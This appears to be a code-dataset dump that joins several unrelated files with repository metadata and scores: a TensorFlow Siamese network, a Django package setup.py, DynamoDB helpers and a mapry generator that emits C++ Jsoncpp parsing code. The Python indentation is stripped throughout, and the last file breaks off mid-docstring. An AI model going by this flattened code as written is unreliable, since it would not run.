self.H_T = tf.transpose(self.H, perm=[0, 2, 1], name="H_T")
self.A = tf.nn.softmax(tf.matmul(self.W_s2, tf.tanh(tf.matmul(self.W_s1, self.H_T)), name="A"))
# sentences embedding matrix M = AH shape(M) = (batch_size, r, 2u)
self.M = tf.matmul(self.A, self.H, name="M")
outputs = tf.reshape(self.M, [batch_size, -1])
with tf.variable_scope("penalization"):
# penalization term: Frobenius norm square of matrix AA^T-I, ie. P = |AA^T-I|_F^2
A_T = tf.transpose(self.A, perm=[0, 2, 1], name="A_T")
I = tf.eye(r, r, batch_shape=[batch_size], name="I")
self.P = tf.square(tf.norm(tf.matmul(self.A, A_T) - I, axis=[-2, -1], ord='fro'), name="P")
else:
outputs = outputs[-1] # take last hidden state [batch_size, hidden_units]
return outputs
def cnn(self, x, sequence_length, embedding_size, filter_sizes, num_filters, scope):
with tf.variable_scope(scope, reuse=tf.AUTO_REUSE):
# Create a convolution + maxpool layer for each filter size
pooled_outputs = []
for i, filter_size in enumerate(filter_sizes):
with tf.variable_scope("conv-maxpool-%s" % filter_size, reuse=None):
# Convolution Layer
filter_shape = [filter_size, embedding_size, 1, num_filters]
W = tf.get_variable("W", filter_shape, initializer=tf.truncated_normal_initializer(stddev=0.1))
b = tf.get_variable("bias", [num_filters], initializer=tf.constant_initializer(0.1))
conv = tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding="VALID", name="conv")
h = tf.nn.relu(tf.nn.bias_add(conv, b), name="relu")
# Maxpooling over the outputs
pooled = tf.nn.max_pool(h, ksize=[1, sequence_length - filter_size + 1, 1, 1],
strides=[1, 1, 1, 1], padding='VALID',name="pool")
pooled_outputs.append(pooled)
# Combine all the pooled features
num_filters_total = num_filters * len(filter_sizes)
h_pool = tf.concat(pooled_outputs, 3)
h_pool_flat = tf.reshape(h_pool, [-1, num_filters_total]) # very sparse !
with tf.name_scope("dropout"):
h_drop = tf.nn.dropout(h_pool_flat, self.dropout_keep_prob)
with tf.name_scope("output"):
W = tf.get_variable("W", shape=[num_filters_total, 128],
initializer=tf.contrib.layers.xavier_initializer())
b = tf.Variable(tf.constant(0.1, shape=[128]), name="b")
outputs = tf.nn.xw_plus_b(h_drop, W, b, name="outputs")
# outputs = h_pool_flat
return outputs
def contrastive_loss(self, y, e, margin, pos_weight):
# margin and pos_weight can directly influence P and R metrics.
l_1 = pos_weight * tf.pow(1-e, 2)
l_0 = tf.square(tf.maximum(e-margin, 0))
loss = tf.reduce_mean(y * l_1 + (1 - y) * l_0)
return loss
@property
def variables(self):
# for v in tf.trainable_variables():
# print(v)
return tf.global_variables()
if __name__ == '__main__':
siamese = SiameseNets(
model_type='rcnn',
sequence_length=15,
embedding_size=128,
word_embedding_type='rand',
vocab_size=1000,
filter_sizes=[3,4,5],
num_filters=100,
rnn_cell='lstm',
hidden_units=64,
num_layers=3,
dense_layer=False,
l2_reg_lambda=1,
pred_threshold=0.5,
energy_func='euclidean',
loss_func='contrasive',
contrasive_loss_pos_weight=1.0,
margin=0.0,
weight_sharing=False)
# get all ops
# print([node.name for node in tf.get_default_graph().as_graph_def().node]) | 2.65625 | 3 |
settingfaz.py | INIDboyzz/Juliana | 1 | 12769746 | x = input()
if x == ".helpf":
print(".help : to show help menu")
| 2.8125 | 3 |
setup.py | nullablebool/django-templated-mail | 0 | 12769747 | <reponame>nullablebool/django-templated-mail
#!/usr/bin/env python
import os
from setuptools import setup
with open('README.rst', 'r') as f:
readme = f.read()
def get_packages(package):
return [
dirpath for dirpath, dirnames, filenames in os.walk(package)
if os.path.exists(os.path.join(dirpath, '__init__.py'))
]
setup(
name='django-templated-mail',
version='1.1.2',
packages=get_packages('templated_mail'),
license='MIT',
author='Sunscrapers',
description='Send emails using Django template system.',
author_email='<EMAIL>',
long_description=readme,
install_requires=[],
include_package_data=True,
url='https://github.com/sunscrapers/django-templated-mail',
classifiers=[
'Development Status :: 5 - Production/Stable',
'Framework :: Django :: 1.11',
'Framework :: Django :: 2.0',
'Framework :: Django :: 2.1',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
]
)
| 1.492188 | 1 |
app/storage/dynamo_api.py | uk-gov-mirror/ONSdigital.eq-survey-runner | 27 | 12769748 | <reponame>uk-gov-mirror/ONSdigital.eq-survey-runner
from flask import current_app
from structlog import get_logger
logger = get_logger()
def put_item(table_name, key_field, item, overwrite=True):
"""Insert an item into table"""
table = get_table(table_name)
put_kwargs = {'Item': item}
if not overwrite:
put_kwargs['ConditionExpression'] = 'attribute_not_exists({key_field})'.format(
key_field=key_field)
response = table.put_item(**put_kwargs)['ResponseMetadata']['HTTPStatusCode']
return response == 200
def get_item(table_name, key):
""" Get an item given its key """
table = get_table(table_name)
response = table.get_item(Key=key, ConsistentRead=True)
item = response.get('Item', None)
return item
def delete_item(table_name, key):
"""Deletes an item by its key
"""
table = get_table(table_name)
response = table.delete_item(Key=key)
item = response.get('Item', None)
return item
def get_table(table_name):
return current_app.eq['dynamodb'].Table(table_name)
| 2.40625 | 2 |
mapry/cpp/generate/jsoncpp_impl.py | Parquery/mapry | 11 | 12769749 | <filename>mapry/cpp/generate/jsoncpp_impl.py
"""Generate the implementation of de/serialization from/to Jsoncpp values."""
# pylint: disable=too-many-lines
# pylint: disable=too-many-arguments
import re
import textwrap
from typing import ( # pylint: disable=unused-import
Dict, List, Mapping, MutableMapping, Set, Union)
import icontract
from icontract import ensure
import mapry
import mapry.cpp.generate
import mapry.cpp.jinja2_env
import mapry.cpp.naming
import mapry.indention
def _needs_regex(a_type: mapry.Type) -> bool:
"""
Check if the type needs a regular expression.
For example, types with pattern constraints need to verify the pattern
with the regular expression.
:param a_type: to be inspected
:return: True if the type needs a regular expression
"""
if isinstance(a_type, mapry.String) and a_type.pattern:
return True
if isinstance(a_type, mapry.Path) and a_type.pattern:
return True
if isinstance(a_type, mapry.Duration):
return True
return False
@ensure(lambda result: not result.endswith('\n'))
def _includes(
graph: mapry.Graph, types_header_path: str, parse_header_path: str,
jsoncpp_header_path: str, cpp: mapry.Cpp) -> str:
"""
Generate the include directives of the implementation file.
:param graph: mapry definition of the object graph
:param types_header_path: defines the types of the object graph
:param parse_header_path: defines the general parsing structures
:param jsoncpp_header_path:
defines parsing and serializing functions from/to Jsoncpp
:param cpp: C++ settings
:return: generated code
"""
# yapf: disable
first_party_block = {
'#include "{}"'.format(pth)
for pth in [types_header_path, parse_header_path, jsoncpp_header_path]}
# yapf: enable
third_party_block = set() # type: Set[str]
stl_block = {
"#include <cstring>", "#include <string>", "#include <sstream>",
'#include <stdexcept>', "#include <memory>", "#include <utility>"
}
##
# See if we need any regular expressions
##
include_regex = False
for a_type, _ in mapry.iterate_over_types(graph=graph):
if _needs_regex(a_type=a_type):
include_regex = True
break
for cls in graph.classes.values():
if cls.id_pattern is not None:
include_regex = True
break
if include_regex:
stl_block.add("#include <regex>")
##
# Date/time includes
##
if cpp.datetime_library == 'ctime':
# yapf: disable
if any(mapry.needs_type(a_type=graph, query=query_type)
for query_type in [mapry.Date, mapry.Time, mapry.Datetime]):
# yapf: enable
# needed at least for tm_to_string function
stl_block.add("#include <cstring>")
elif cpp.datetime_library == 'date.h':
# yapf: disable
if any(mapry.needs_type(a_type=graph, query=query_type)
for query_type in [mapry.Date, mapry.Time, mapry.Datetime]):
# yapf: enable
# needed at least to parse the date.h date/times.
stl_block.add("#include <sstream>")
third_party_block.add("#include <date/date.h>")
if mapry.needs_type(a_type=graph, query=mapry.TimeZone):
third_party_block.add("#include <date/tz.h>")
else:
raise NotImplementedError(
"Unhandled datetime library: {}".format(cpp.datetime_library))
if mapry.needs_type(a_type=graph, query=mapry.Duration):
# needed at least for duration_to_string function
stl_block.add("#include <iomanip>")
# needed at least for duration_from_string function
stl_block.add("#include <limits>")
stl_block.add("#include <cmath>")
##
# Assemble
##
# yapf: disable
block_strs = (
['\n'.join(sorted(first_party_block))] +
['\n'.join(sorted(third_party_block))] +
['\n'.join(sorted(stl_block))])
# yapf: enable
return '\n\n'.join(
[block_str for block_str in block_strs if block_str.strip()])
@ensure(lambda result: not result.endswith('\n'))
def _message_function() -> str:
"""
Generate the function that joins strings for error messages.
:return: generated code
"""
return textwrap.dedent(
'''\
/**
* generates an error message.
*
* @param cc char array as the description part of the message
* @param cc_size size of the char array
* @param s string as the detail part of the message
* @return concatenated string
*/
std::string message(const char* cc, size_t cc_size, std::string s) {
std::string result;
result.reserve(cc_size + s.size());
result.append(cc, cc_size);
result.append(s);
return result;
}''')
@ensure(lambda result: not result.endswith('\n'))
def _regex_constants(graph: mapry.Graph) -> str:
"""
Generate the code to define regular expressions as constants.
:param graph: mapry definition of the object graph
:return: generated code
"""
blocks = [] # type: List[str]
# define regular expressions for duration
if mapry.needs_type(a_type=graph, query=mapry.Duration):
re_block = mapry.indention.reindent(
'''\
namespace re {
const std::regex kDuration(
"^(\\\\+|-)?P(((0|[1-9][0-9]*)(\\\\.[0-9]+)?)Y)?"
"(((0|[1-9][0-9]*)(\\\\.[0-9]+)?)M)?"
"(((0|[1-9][0-9]*)(\\\\.[0-9]+)?)W)?"
"(((0|[1-9][0-9]*)(\\\\.[0-9]+)?)D)?"
"(T"
"(((0|[1-9][0-9]*)(\\\\.[0-9]+)?)H)?"
"(((0|[1-9][0-9]*)(\\\\.[0-9]+)?)M)?"
"(((0|[1-9][0-9]*)(\\\\.([0-9]+))?)S)?"
")?$");
} // namespace re''')
blocks.append(re_block)
for cls in graph.classes.values():
if cls.id_pattern is None:
continue
blocks.append(
textwrap.dedent(
'''\
namespace {composite_varname}_re {{
const std::regex kID(
R"v0g0n({regex})v0g0n");
}} // namespace {composite_varname}_re'''.format(
composite_varname=mapry.cpp.naming.as_variable(
identifier=cls.name),
regex=cls.id_pattern.pattern)))
return "\n\n".join(blocks)
@ensure(lambda result: not result.endswith('\n'))
def _duration_from_string() -> str:
"""
Generate the code for parsing durations from strings.
:return: generated code
"""
return textwrap.dedent(
'''\
/**
* adds the left and the right and checks for the overflow.
*
* left and right are expected to be non-negative.
*
* @param[in] left summand
* @param[in] right summand
* @param[out] overflows true if the addition overflows
* @return sum
*/
template <typename rep_t>
rep_t add_rep_double(rep_t left, double right, bool* overflows) {
if (left < 0) {
throw std::invalid_argument("Expected left >= 0");
}
if (right < 0) {
throw std::invalid_argument("Expected right >= 0");
}
// 9223372036854775808 == 2^63, the first double that is
// greater than max int64 (max int64 is 2^63 - 1).
if (right >= 9223372036854775808.0) {
*overflows = true;
return 0;
}
const rep_t rightRep = right;
if (rightRep > std::numeric_limits<rep_t>::max() - left) {
*overflows = true;
return 0;
}
return rightRep + left;
}
/**
* parses the duration from a string.
*
* Following STL chrono library, the following units are counted as:
* - years as 365.2425 days (the average length of a Gregorian year),
* - months as 30.436875 days (exactly 1/12 of years) and
* - weeks as 7 days.
*
* See https://en.cppreference.com/w/cpp/chrono/duration for details.
*
* @param[in] s string to parse
* @param[out] error error message, if any
* @return parsed duration
*/
std::chrono::nanoseconds duration_from_string(
const std::string& s,
std::string* error) {
std::smatch mtch;
const bool matched = std::regex_match(s, mtch, re::kDuration);
if (!matched) {
std::stringstream sserr;
sserr << "failed to match the duration: " << s;
*error = sserr.str();
return std::chrono::nanoseconds();
}
typedef std::chrono::nanoseconds::rep rep_t;
////
// Extract nanoseconds
////
const std::string nanoseconds_str = mtch[31];
rep_t nanoseconds;
if (nanoseconds_str.size() == 0) {
// No nanoseconds specified
nanoseconds = 0;
} else if(nanoseconds_str.size() <= 9) {
size_t first_nonzero = 0;
for (; first_nonzero < nanoseconds_str.size();
++first_nonzero) {
if (nanoseconds_str[first_nonzero] >= '0' and
nanoseconds_str[first_nonzero] <= '9') {
break;
}
}
if (first_nonzero == nanoseconds_str.size()) {
// No non-zero numbers, all zeros behind the seconds comma
nanoseconds = 0;
} else {
const rep_t fraction_as_integer(
std::atol(&nanoseconds_str[first_nonzero]));
const size_t order = 9 - nanoseconds_str.size();
rep_t multiplier = 1;
for (size_t i = 0; i < order; ++i) {
multiplier *= 10;
}
nanoseconds = fraction_as_integer * multiplier;
}
} else {
// Signal that the precision is lost
std::stringstream sserr;
sserr << "converting the duration to nanoseconds "
"results in loss of precision: " << s;
*error = sserr.str();
return std::chrono::nanoseconds();
}
////
// Extract all the other interval counts
////
const std::string sign_str = mtch[1];
const rep_t sign = (sign_str.empty() or sign_str == "+") ? 1 : -1;
const double years(
(mtch[3].length() == 0) ? 0.0 : std::stod(mtch[3]));
const double months(
(mtch[7].length() == 0) ? 0.0 : std::stod(mtch[7]));
const double weeks(
(mtch[11].length() == 0) ? 0.0 : std::stod(mtch[11]));
const double days(
(mtch[15].length() == 0) ? 0.0 : std::stod(mtch[15]));
const double hours(
(mtch[20].length() == 0) ? 0.0 : std::stod(mtch[20]));
const double minutes(
(mtch[24].length() == 0) ? 0.0 : std::stod(mtch[24]));
const rep_t seconds(
(mtch[29].length() == 0) ? 0 : std::stol(mtch[29]));
////
// Sum
////
rep_t sum = nanoseconds;
const rep_t max_seconds(
std::numeric_limits<rep_t>::max() / (1000L * 1000L * 1000L));
if (seconds > max_seconds) {
std::stringstream sserr;
sserr << "seconds in duration overflow as nanoseconds: " << s;
*error = sserr.str();
return std::chrono::nanoseconds();
}
const rep_t seconds_as_ns = seconds * 1000L * 1000L * 1000L;
if (sum > std::numeric_limits<rep_t>::max() - seconds_as_ns) {
std::stringstream sserr;
sserr << "duration overflow as nanoseconds: " << s;
*error = sserr.str();
return std::chrono::nanoseconds();
}
sum += seconds_as_ns;
bool overflows;
sum = add_rep_double(
sum, minutes * 6e10, &overflows);
if (overflows) {
std::stringstream sserr;
sserr << "duration overflows as nanoseconds: " << s;
*error = sserr.str();
return std::chrono::nanoseconds();
}
sum = add_rep_double(
sum, hours * 3.6e12, &overflows);
if (overflows) {
std::stringstream sserr;
sserr << "duration overflows as nanoseconds: " << s;
*error = sserr.str();
return std::chrono::nanoseconds();
}
sum = add_rep_double(
sum, days * 24.0 * 3.6e12, &overflows);
if (overflows) {
std::stringstream sserr;
sserr << "duration overflows as nanoseconds: " << s;
*error = sserr.str();
return std::chrono::nanoseconds();
}
sum = add_rep_double(
sum, weeks * 7.0 * 24.0 * 3.6e12, &overflows);
if (overflows) {
std::stringstream sserr;
sserr << "duration overflows as nanoseconds: " << s;
*error = sserr.str();
return std::chrono::nanoseconds();
}
sum = add_rep_double(
sum, months * 30.436875 * 24.0 * 3.6e12, &overflows);
if (overflows) {
std::stringstream sserr;
sserr << "duration overflows as nanoseconds: " << s;
*error = sserr.str();
return std::chrono::nanoseconds();
}
sum = add_rep_double(
sum, years * 365.2425 * 24.0 * 3.6e12, &overflows);
if (overflows) {
std::stringstream sserr;
sserr << "duration overflows as nanoseconds: " << s;
*error = sserr.str();
return std::chrono::nanoseconds();
}
// sum is always positive, so the multiplication by -1 can not
// overflow since |max rep_t| < |min rep_t|
if (sign < 0) {
sum = -sum;
}
return std::chrono::nanoseconds(sum);
}''')
@ensure(lambda result: not result.endswith('\n'))
def _value_type_to_string() -> str:
"""
Generate the function to convert Json::ValueType to a string.
:return: generated code
"""
return textwrap.dedent(
'''\
/**
* converts a JSON value type to a human-readable string representation.
*
* @param value_type to be converted
* @return string representation of the JSON value type
*/
std::string value_type_to_string(Json::ValueType value_type) {
switch (value_type) {
case Json::ValueType::nullValue: return "null";
case Json::ValueType::intValue: return "int";
case Json::ValueType::uintValue: return "uint";
case Json::ValueType::realValue: return "real";
case Json::ValueType::stringValue: return "string";
case Json::ValueType::booleanValue: return "bool";
case Json::ValueType::arrayValue: return "array";
case Json::ValueType::objectValue: return "object";
default:
std::stringstream ss;
ss << "Unhandled value type in value_to_string: "
<< value_type;
throw std::domain_error(ss.str());
}
}''')
class _AutoID:
"""Keep track of parsing identifiers."""
def __init__(self) -> None:
"""Initialize with a zero identifier."""
self._next_id = 0
@ensure(
lambda result: re.match(r'^0|[1-9][0-9]*$', result),
enabled=icontract.SLOW)
def next_identifier(self) -> str:
"""
Generate the next identifier.
:return: the generated identifier
"""
result = self._next_id
self._next_id += 1
return str(result)
_PARSE_BOOLEAN_TPL = mapry.cpp.jinja2_env.ENV.from_string(
'''\
{# Assume `errors` is defined to collect errors. #}
{% if value_expr|is_variable %}
{# short-circuit value as value expression if it is a variable so that
we don't end up with an unnecessary variable1 = variable2 statement.#}
{% set value = value_expr %}
{% else %}
{% set value = "value_%s"|format(uid) %}
const Json::Value& value_{{ uid }} = {{ value_expr }};
{% endif %}
if (!{{ value }}.isBool()) {
constexpr auto expected_but_got(
"Expected a bool, but got: ");
errors->add(
{{ ref_parts|join_strings|indent|indent }},
message(
expected_but_got,
strlen(expected_but_got),
value_type_to_string(
{{ value }}.type())));
} else {
{{ target_expr }} = {{ value }}.asBool();
}''')
@ensure(lambda result: not result.endswith('\n'))
def _parse_boolean(
value_expr: str, target_expr: str, ref_parts: List[str],
auto_id: _AutoID) -> str:
"""
Generate the code to parse a boolean.
The code parses the ``value_expr`` into the ``target_expr``.
:param value_expr: C++ expression of the JSON value
:param target_expr: C++ expression of where to store the parsed value
:param ref_parts: C++ expression of reference path segments to the value
:param auto_id: generator of unique identifiers
:return: C++ code
"""
uid = auto_id.next_identifier()
return _PARSE_BOOLEAN_TPL.render(
uid=uid,
value_expr=value_expr,
ref_parts=ref_parts,
target_expr=target_expr)
_PARSE_INTEGER_TPL = mapry.cpp.jinja2_env.ENV.from_string(
'''\
{# Assume `errors` is defined to collect errors. #}
{% if value_expr|is_variable %}
{# Short-circuit value as value expression if it is a variable so that
we don't end up with an unnecessary variable1 = variable2 statement.#}
{% set value = value_expr %}
{% else %}
{% set value = "value_%s"|format(uid) %}
const Json::Value& value_{{ uid }} = {{ value_expr }};
{% endif %}{# /value_expr|is_variable #}
if (!{{ value }}.isInt64()) {
constexpr auto expected_but_got(
"Expected an int64, but got: ");
errors->add(
{{ ref_parts|join_strings|indent|indent }},
message(
expected_but_got,
strlen(expected_but_got),
value_type_to_string(
{{ value }}.type())));
} else {
{% if a_type.minimum is none and a_type.maximum is none %}
{{ target_expr }} = {{ value }}.asInt64();
{% else %}
const auto cast_{{ uid }} = {{ value }}.asInt64();
bool ok_{{ uid }} = true;
{% if a_type.minimum is not none %}
{% set op = ">" if a_type.exclusive_minimum else ">=" %}
if (!(cast_{{ uid }} {{ op }} {{ a_type.minimum }})) {
constexpr auto expected_but_got(
"Expected "
{{ "%s %d"|format(op, a_type.minimum)|escaped_str }}
", but got: ");
errors->add(
{{ ref_parts|join_strings|indent|indent|indent }},
message(
expected_but_got,
strlen(expected_but_got),
std::to_string(cast_{{ uid }})));
ok_{{ uid }} = false;
}
{% endif %}
{% if a_type.maximum is not none %}
{% set op = "<" if a_type.exclusive_maximum else "<=" %}
if (!(cast_{{ uid }} {{ op }} {{ a_type.maximum }})) {
constexpr auto expected_but_got(
"Expected "
{{ "%s %d"|format(op, a_type.maximum)|escaped_str }}
", but got: ");
errors->add(
{{ ref_parts|join_strings|indent|indent|indent }},
message(
expected_but_got,
strlen(expected_but_got),
std::to_string(cast_{{ uid }})));
ok_{{ uid }} = false;
}
{% endif %}
if (ok_{{ uid }}) {
{{ target_expr }} = cast_{{ uid }};
}
{% endif %}{# /if a_type.minimum is none and a_type.maximum is none #}
}
''')
@ensure(lambda result: not result.endswith('\n'))
def _parse_integer(
value_expr: str, target_expr: str, ref_parts: List[str],
a_type: mapry.Integer, auto_id: _AutoID) -> str:
"""
Generate the code to parse an integer.
The code parses the ``value_expr`` into the ``target_expr``.
:param value_expr: C++ expression of the JSON value
:param target_expr: C++ expression of where to store the parsed value
:param ref_parts: C++ expression of reference path segments to the value
:param a_type: mapry definition of the value type
:param auto_id: generator of unique identifiers
:return: generated code
"""
uid = auto_id.next_identifier()
return _PARSE_INTEGER_TPL.render(
uid=uid,
value_expr=value_expr,
ref_parts=ref_parts,
target_expr=target_expr,
a_type=a_type).rstrip("\n")
_PARSE_FLOAT_TPL = mapry.cpp.jinja2_env.ENV.from_string(
'''\
{# Assume `errors` is defined to collect errors. #}
{% if value_expr|is_variable %}
{# Short-circuit value as value expression if it is a variable so that
we don't end up with an unnecessary variable1 = variable2 statement.#}
{% set value = value_expr %}
{% else %}
{% set value = "value_%s"|format(uid) %}
const Json::Value& value_{{ uid }} = {{ value_expr }};
{% endif %}
if (!{{ value }}.isDouble()) {
constexpr auto expected_but_got(
"Expected a double, but got: ");
errors->add(
{{ ref_parts|join_strings|indent|indent }},
message(
expected_but_got,
strlen(expected_but_got),
value_type_to_string(
{{ value }}.type())));
} else {
{% if a_type.minimum is none and a_type.maximum is none %}
{{ target_expr }} = {{ value }}.asDouble();
{% else %}
const auto cast_{{ uid }} = {{ value }}.asDouble();
bool ok_{{ uid }} = true;
{% if a_type.minimum is not none %}
{% set op = ">" if a_type.exclusive_minimum else ">=" %}
if (!(cast_{{ uid }} {{ op }} {{ a_type.minimum }})) {
constexpr auto expected_but_got(
"Expected "
{{ "%s %f"|format(op, a_type.minimum)|escaped_str }}
", but got: ");
errors->add(
{{ ref_parts|join_strings|indent|indent|indent }},
message(
expected_but_got,
strlen(expected_but_got),
std::to_string(cast_{{ uid }})));
ok_{{ uid }} = false;
}
{% endif %}{# /if a_type.minimum is not none #}
{% if a_type.maximum is not none %}
{% set op = "<" if a_type.exclusive_maximum else "<=" %}
if (!(cast_{{ uid }} {{ op }} {{ a_type.maximum }})) {
constexpr auto expected_but_got(
"Expected "
{{ "%s %f"|format(op, a_type.maximum)|escaped_str }}
", but got: ");
errors->add(
{{ ref_parts|join_strings|indent|indent|indent }},
message(
expected_but_got,
strlen(expected_but_got),
std::to_string(cast_{{ uid }})));
ok_{{ uid }} = false;
}
{% endif %}{# /if a_type.maximum is not none #}
if (ok_{{ uid }}) {
{{ target_expr }} = cast_{{ uid }};
}
{% endif %}{# /if a_type.minimum is none and a_type.maximum is none #}
}''')
@ensure(lambda result: not result.endswith('\n'))
def _parse_float(
value_expr: str, target_expr: str, ref_parts: List[str],
a_type: mapry.Float, auto_id: _AutoID) -> str:
"""
Generate the code to parse a floating-point number.
The code parses the ``value_expr`` into the ``target_expr``.
:param value_expr: C++ expression of the JSON value
:param target_expr: C++ expression of where to store the parsed value
:param ref_parts: C++ expression of reference path segments to the value
:param a_type: mapry definition of the value type
:param auto_id: generator of unique identifiers
:return: generated code
"""
uid = auto_id.next_identifier()
return _PARSE_FLOAT_TPL.render(
uid=uid,
value_expr=value_expr,
ref_parts=ref_parts,
target_expr=target_expr,
a_type=a_type).rstrip("\n")
_PARSE_STRING_TPL = mapry.cpp.jinja2_env.ENV.from_string(
'''\
{# Assume `errors` is defined to collect errors. #}
{% if value_expr|is_variable %}
{# Short-circuit value as value expression if it is a variable so that
we don't end up with an unnecessary variable1 = variable2 statement.#}
{% set value = value_expr %}
{% else %}
{% set value = "value_%s"|format(uid) %}
const Json::Value& value_{{ uid }} = {{ value_expr }};
{% endif %}
if (!{{ value }}.isString()) {
constexpr auto expected_but_got(
"Expected a string, but got: ");
errors->add(
{{ ref_parts|join_strings|indent|indent }},
message(
expected_but_got,
strlen(expected_but_got),
value_type_to_string(
{{ value }}.type())));
} else {
{% if a_type.pattern is none %}
{{ target_expr }} = {{ value }}.asString();
{% else %}
const static std::regex regex_{{ uid }}(
R"v0g0n({{ a_type.pattern.pattern }})v0g0n");
const std::string cast_{{ uid }} = {{ value }}.asString();
bool ok_{{ uid }} = true;
if (!std::regex_match(cast_{{ uid }}, regex_{{ uid }})) {
constexpr auto expected_but_got(
"Expected to match "
{{ a_type.pattern.pattern|escaped_str }}
", but got: ");
errors->add(
{{ ref_parts|join_strings|indent|indent|indent }},
message(
expected_but_got,
strlen(expected_but_got),
cast_{{ uid }}));
ok_{{ uid }} = false;
}
if (ok_{{ uid }}) {
{{ target_expr }} = cast_{{ uid }};
}
{% endif %}{# /if a_type.pattern is none #}
}''')
@ensure(lambda result: not result.endswith('\n'))
def _parse_string(
value_expr: str, target_expr: str, ref_parts: List[str],
a_type: mapry.String, auto_id: _AutoID) -> str:
"""
Generate the code to parse a string.
The code parses the ``value_expr`` into the ``target_expr``.
:param value_expr: C++ expression of the JSON value
:param target_expr: C++ expression of where to store the parsed value
:param ref_parts: C++ expression of reference path segments to the value
:param a_type: mapry definition of the value type
:param auto_id: generator of unique identifiers
:return: generated code
"""
uid = auto_id.next_identifier()
return _PARSE_STRING_TPL.render(
uid=uid,
value_expr=value_expr,
ref_parts=ref_parts,
target_expr=target_expr,
a_type=a_type).rstrip("\n")
_PARSE_PATH_TPL = mapry.cpp.jinja2_env.ENV.from_string(
'''\
{# Assume `errors` is defined to collect errors. #}
{% if value_expr|is_variable %}
{# Short-circuit value as value expression if it is a variable so that
we don't end up with an unnecessary variable1 = variable2 statement.#}
{% set value = value_expr %}
{% else %}
{% set value = "value_%s"|format(uid) %}
const Json::Value& value_{{ uid }} = {{ value_expr }};
{% endif %}
if (!{{ value }}.isString()) {
constexpr auto expected_but_got(
"Expected a string, but got: ");
errors->add(
{{ ref_parts|join_strings|indent|indent }},
message(
expected_but_got,
strlen(expected_but_got),
value_type_to_string(
{{ value }}.type())));
} else {
{% set set_target %}
{% if cpp.path_as == "std::filesystem::path" %}
{{ target_expr }} = std::filesystem::path(
{{ value }}.asString());
{% elif cpp.path_as == "boost::filesystem::path" %}
{{ target_expr }} = boost::filesystem::path(
{{ value }}.asString());
{% else %}
{{ _raise("Unhandled cpp.path_as: %s"|format(cpp.path_as)) }}
{% endif %}
{% endset %}{#
#}
{% if a_type.pattern is none %}
{{ set_target }}
{% else %}
const static std::regex regex(
R"v0g0n({{ a_type.pattern.pattern }})v0g0n");
const std::string cast_{{ uid }} = {{ value }}.asString();
bool ok_{{ uid }} = true;
if (!std::regex_match(cast_{{ uid }}, regex)) {
constexpr auto expected_but_got(
"Expected to match "
{{ a_type.pattern.pattern|escaped_str }}
", but got: ");
errors->add(
{{ ref_parts|join_strings|indent|indent|indent }},
message(
expected_but_got,
strlen(expected_but_got),
cast_{{ uid }}));
ok_{{ uid }} = false;
}
if (ok_{{ uid }}) {
{{ set_target|indent }}
}
{% endif %}{# /if a_type.pattern is none #}
}''')
@ensure(lambda result: not result.endswith('\n'))
def _parse_path(
value_expr: str, target_expr: str, ref_parts: List[str],
a_type: mapry.Path, auto_id: _AutoID, cpp: mapry.Cpp) -> str:
"""
Generate the code to parse a path.
The code parses the ``value_expr`` into the ``target_expr``.
:param value_expr: C++ expression of the JSON value
:param target_expr: C++ expression of where to store the parsed value
:param ref_parts: C++ expression of reference path segments to the value
:param a_type: mapry definition of the value type
:param auto_id: generator of unique identifiers
:param cpp: C++ settings
:return: generated code
"""
uid = auto_id.next_identifier()
return _PARSE_PATH_TPL.render(
uid=uid,
value_expr=value_expr,
ref_parts=ref_parts,
target_expr=target_expr,
a_type=a_type,
cpp=cpp).rstrip("\n")
_PARSE_CTIME_TPL = mapry.cpp.jinja2_env.ENV.from_string(
'''\
{# Assume `errors` is defined to collect errors. #}
{% if value_expr|is_variable %}
{# Short-circuit value as value expression if it is a variable so that
we don't end up with an unnecessary variable1 = variable2 statement.#}
{% set value = value_expr %}
{% else %}
{% set value = "value_%s"|format(uid) %}
const Json::Value& value_{{ uid }} = {{ value_expr }};
{% endif %}
if (!{{ value }}.isString()) {
constexpr auto expected_but_got(
"Expected a string, but got: ");
errors->add(
{{ ref_parts|join_strings|indent|indent }},
message(
expected_but_got,
strlen(expected_but_got),
value_type_to_string(
{{ value }}.type())));
} else {
const std::string cast_{{ uid }} = {{ value }}.asString();
struct tm tm_{{ uid }} = tm{0};
char* ret_{{ uid }} = strptime(
cast_{{ uid }}.c_str(),
{{ a_type.format|escaped_str }},
&tm_{{ uid }});
if (ret_{{ uid }} == nullptr or *ret_{{ uid }} != '\\0') {
constexpr auto expected_but_got(
"Expected to strptime "
{{ a_type.format|escaped_str }}
", but got: ");
errors->add(
{{ ref_parts|join_strings|indent|indent|indent }},
message(
expected_but_got,
strlen(expected_but_got),
cast_{{ uid }}));
} else {
{{ target_expr }} = tm_{{ uid }};
}
}''')
_PARSE_DATE_TPL = mapry.cpp.jinja2_env.ENV.from_string(
'''\
{# Assume `errors` is defined to collect errors. #}
{% if value_expr|is_variable %}
{# Short-circuit value as value expression if it is a variable so that
we don't end up with an unnecessary variable1 = variable2 statement.#}
{% set value = value_expr %}
{% else %}
{% set value = "value_%s"|format(uid) %}
const Json::Value& value_{{ uid }} = {{ value_expr }};
{% endif %}
if (!{{ value }}.isString()) {
constexpr auto expected_but_got(
"Expected a string, but got: ");
errors->add(
{{ ref_parts|join_strings|indent|indent }},
message(
expected_but_got,
strlen(expected_but_got),
value_type_to_string(
{{ value }}.type())));
} else {
std::istringstream iss_{{ uid }}(
{{ value }}.asString());
iss_{{ uid }} >>
date::parse(
{{ a_type.format|escaped_str }},
{{ target_expr }} );
if (iss_{{ uid }}.fail()) {
constexpr auto expected_but_got(
"Expected to date::parse "
{{ a_type.format|escaped_str }}
", but got: ");
errors->add(
{{ ref_parts|join_strings|indent|indent|indent }},
message(
expected_but_got,
strlen(expected_but_got),
{{ value }}.asString()));
}
}''')
@ensure(lambda result: not result.endswith('\n'))
def _parse_date(
value_expr: str, target_expr: str, ref_parts: List[str],
a_type: mapry.Date, auto_id: _AutoID, cpp: mapry.Cpp) -> str:
"""
Generate the code to parse a date.
The code parses the ``value_expr`` into the ``target_expr``.
:param value_expr: C++ expression of the JSON value
:param target_expr: C++ expression of where to store the parsed value
:param ref_parts: C++ expression of reference path segments to the value
:param a_type: mapry definition of the value type
